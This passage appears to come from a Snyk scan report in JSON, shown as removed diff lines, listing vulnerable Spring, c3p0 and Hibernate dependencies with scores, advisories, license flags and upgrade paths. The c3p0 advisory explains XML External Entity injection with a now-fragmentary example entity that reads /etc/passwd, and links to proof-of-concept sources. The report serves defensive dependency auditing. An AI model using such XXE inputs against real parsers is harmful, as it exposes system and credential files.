source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", - "epssDetails": { - "percentile": "0.75300", - "probability": "0.00449", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22970" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.springframework:spring-beans", - "proprietary": false, - "creationTime": "2022-05-12T08:45:35.744127Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-05-12T08:17:10Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-beans" - }, - "publicationTime": "2022-05-12T09:49:10.833602Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:48.407397Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.22.RELEASE", - "org.springframework:spring-beans@5.2.22.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-beans", - "version": "3.2.6.RELEASE" - }, - { - "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "title": "Improper Handling of Case Sensitivity", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,5.2.21)", - "[5.3.0, 5.3.19)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "5.2.21", - "5.3.19" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 3.7, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.springframework:spring-context", - "references": [ - { - "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/spring-projects/spring-framework/issues/28333", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/MarcinGadz/spring-rce-poc", - "title": "PoC" - }, - { - "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", - "title": "Spring Blog Post" - }, - { - "url": "https://tanzu.vmware.com/security/cve-2022-22968", - "title": "Tanzu Advisory" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.7, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:31.233852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:26.822810Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:16.458425Z" - } - ], - "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", - "epssDetails": { - "percentile": "0.29205", - "probability": "0.00065", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-22968" - ], - "CWE": [ - "CWE-178" - ] - }, - "packageName": "org.springframework:spring-context", - "proprietary": false, - "creationTime": "2022-04-14T11:54:10.207823Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-04-14T11:43:54Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.springframework", - "artifactId": "spring-context" - }, - "publicationTime": "2022-04-14T12:09:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:16.458425Z", - "socialTrendAlert": false, - "severityWithCritical": "low", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.springframework:spring-context@3.2.6.RELEASE" - ], - "upgradePath": [ - false, - "org.springframework:spring-context@5.2.21.RELEASE" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.springframework:spring-context", - "version": "3.2.6.RELEASE" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final" - } - ], - "ok": false, - "dependencyCount": 34, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "22 vulnerable dependency paths", - "remediation": { - "unresolved": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.3.0.CR1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-core", - "creationTime": "2024-06-18T19:09:16.096Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T19:09:16.096Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-core", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.5.4,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.aspectj:aspectjweaver", - "creationTime": "2024-06-18T21:24:04.112Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T21:24:04.112Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.aspectj:aspectjweaver@1.8.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.aspectj:aspectjweaver", - "version": "1.8.2", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[4.0.0.CR1,)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.hibernate.common:hibernate-commons-annotations", - "creationTime": "2024-06-18T11:03:46.980Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:03:46.980Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.common:hibernate-commons-annotations", - "version": "4.0.5.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", - "type": "license", - "title": "EPL-1.0 license", - "semver": { - "vulnerable": [ - "[1.0.0.Final,)" - ] - }, - "license": "EPL-1.0", - "language": "java", - "description": "EPL-1.0 license", - "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "creationTime": "2024-06-18T12:03:42.953Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T12:03:42.953Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final", - "severityWithCritical": "medium" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final", - "severityWithCritical": "medium" - } - ], - "upgrade": { - "org.hibernate:hibernate-core@4.3.7.Final": { - "upgradeTo": "org.hibernate:hibernate-core@5.4.24.Final", - "upgrades": [ - "org.hibernate:hibernate-core@4.3.7.Final", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1", - "dom4j:dom4j@1.6.1" - ], - "vulns": [ - "SNYK-JAVA-ORGHIBERNATE-1041788", - "SNYK-JAVA-ORGHIBERNATE-584563", - "SNYK-JAVA-DOM4J-174153", - "SNYK-JAVA-DOM4J-2812975" - ] - }, - "org.hsqldb:hsqldb@2.3.2": { - "upgradeTo": "org.hsqldb:hsqldb@2.7.1", - "upgrades": [ - "org.hsqldb:hsqldb@2.3.2" - ], - "vulns": [ - "SNYK-JAVA-ORGHSQLDB-3040860" - ] - }, - "org.springframework:spring-context@3.2.6.RELEASE": { - "upgradeTo": "org.springframework:spring-context@5.2.24.RELEASE", - "upgrades": [ - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE", - "org.springframework:spring-context@3.2.6.RELEASE", - "org.springframework:spring-expression@3.2.6.RELEASE", - "org.springframework:spring-beans@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE", - "org.springframework:spring-core@3.2.6.RELEASE" - ], - "vulns": [ - "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", - "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325" - ] - } - }, - "patch": {}, - "ignore": {}, - 